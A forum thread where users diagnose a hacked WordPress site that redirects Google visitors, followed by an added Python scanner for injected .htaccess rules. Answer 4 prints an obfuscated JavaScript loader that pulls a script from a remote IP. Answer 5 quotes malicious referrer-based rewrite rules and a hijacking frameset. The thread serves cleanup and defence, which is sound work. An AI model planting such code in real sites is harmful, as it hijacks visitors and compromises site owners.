
page redirect after Google search - Wordpress site

Posted 2019-09-17 14:13

Question:

We have the page domain.., and when you search google.nl for Critical Alignment and click on the homepage of the site, you are redirected after a couple of seconds to http://www.venusfactor.com/welcome/. We think the site is hacked, but cannot find a redirect or anything.

Can someone help?

Answer 1:

Have you checked if the redirect is made where the domain is hosted? Don't know what kind of host you use, but maybe the domain is set to redirect to that page from the host's side.



Answer 2:

A good guide on what to do when your site gets hacked is this: http://codex.wordpress.org/FAQ_My_site_was_hacked

For your issue, check .htaccess first. There might be some redirect lines on the farthest right side of the file, so use the horizontal scroll bar.

Also, I would suggest checking with your host, since there might be many more files affected.



Answer 3:

The same thing happened to me also.

First I thought it was a DNS hack problem, since it was a redirection problem. The hosting company responded to me that the DNS had no problems. They checked other common problems to find the source of the redirection and I was told that I had a malicious script in the header.php file, in the active theme folder.

I manually checked the file in cPanel and I found the script that caused the redirection. To read more about this, check the article on IStartBlogging.



Answer 4:

A new virus is spreading that is abusing the xmlrpc.php of WordPress to inject itself into the server and replace the JavaScript files with its own contaminated copies.

If you see too many xmlrpc POST requests from a suspicious IP address, such as the below, verify the integrity of your JavaScript files.

$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

One key feature of this virus is that it primarily targets jQuery.js, replacing it with its own version (which, when users browse to your site, automatically redirects them to clickbait articles).

It achieves this by first posting new PHP files, such as recure.php, which usually contain obfuscated PHP code, or by uploading WordPress plugins to the upload folder.



Answer 5:

Most probably the attackers are trying to redirect the page to a different website if the referring pages are google, yahoo, msn, aol, bing.
They will give back a frameset (similar to an iframe) when we request the pages from the above-specified referrers.

    <frameset rows="*,0" framespacing="0" border="0" frameborder="NO" data-gr-c-s-loaded="true">
        <frame src="http://remote_site_address_here" noresize="" scrolling="auto">
        <link rel="stylesheet" type="text/css" href="chrome-extensionlink/content.css">
    </frameset>

So we will see our website name at the top of the address bar but the site content will be different. These are the common files that the hackers use to inject suspicious code.

  1. index.php
  2. index.html
  3. header.php
  4. footer.php
  5. functions.php
  6. theme files
  7. .htaccess

Recently infected cases show that the malicious code is injected into the .htaccess file. Here I am demonstrating an injected .htaccess file. Open the .htaccess file in your web root directory and you can see this configuration:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]

Here they are redirecting to the malicious PHP file emilie-amethyst.php if the referring pages are google|yahoo|msn|aol|bing. This is the reason for the redirect issue.
So you have to remove this redirection configuration from your .htaccess file and also remove the malicious script (in this case it is emilie-amethyst.php).

Try clicking the link from Google search. If you still see the problem, remove all cookies related to this particular site and retry. It should solve the issue.
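
A defensive check for the two things answers 2 and 5 describe: directives pushed far to the right with whitespace, and rewrite rules conditioned on a search-engine referrer or user agent. This is an added example, not code from any of the answers; the function name `scan_htaccess`, the padding threshold `PAD` and the sample file are assumptions constructed for illustration.

```python
import re

# Search-engine names matched by the injected conditions shown on this page.
ENGINES = re.compile(r"google|yahoo|msn|aol|bing", re.I)
SNIFFED = re.compile(r"%\{HTTP_(REFERER|USER_AGENT)\}", re.I)
PAD = 40  # assumption: leading whitespace this wide hides a line off-screen

def scan_htaccess(text):
    """Return (line_no, reason, detail) findings for one .htaccess file."""
    findings, pending = [], []  # pending: RewriteCond pairs awaiting a rule
    for no, raw in enumerate(text.splitlines(), 1):
        wide = raw.expandtabs()
        line = wide.strip()
        if not line or line.startswith("#"):
            continue
        if len(wide) - len(wide.lstrip()) >= PAD:
            findings.append((no, "padded", line))
        parts = line.split()
        name = parts[0].lower()
        if name == "rewritecond" and len(parts) >= 3:
            pending.append((parts[1], parts[2]))
        elif name == "rewriterule":
            if any(SNIFFED.search(v) and ENGINES.search(p) for v, p in pending):
                # Report the rewrite target so the dropped script can be found.
                target = parts[2].split("?")[0] if len(parts) >= 3 else ""
                findings.append((no, "search-engine-conditional", target))
            pending = []  # conditions bind only to the next RewriteRule
    return findings

# Constructed sample: a trimmed WordPress block plus the injected rules quoted
# in answer 5, padded with spaces the way answer 2 describes.
SAMPLE = "\n".join([
    "# BEGIN WordPress",
    "RewriteEngine On",
    r"RewriteRule ^index\.php$ - [L]",
    "RewriteCond %{REQUEST_FILENAME} !-f",
    "RewriteRule . /index.php [L]",
    "# END WordPress",
    " " * 200 + "RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]",
    " " * 200 + "RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)",
    " " * 200 + "RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]",
])

if __name__ == "__main__":
    for no, reason, detail in scan_htaccess(SAMPLE):
        print(f"line {no}: {reason}: {detail}")
```

A legitimate rule can also test the user agent, so a hit marks a line to read rather than proof of compromise.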